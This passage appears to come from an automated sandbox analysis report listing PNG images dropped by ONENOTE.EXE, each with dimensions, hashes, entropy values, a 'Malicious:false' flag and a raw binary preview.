                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
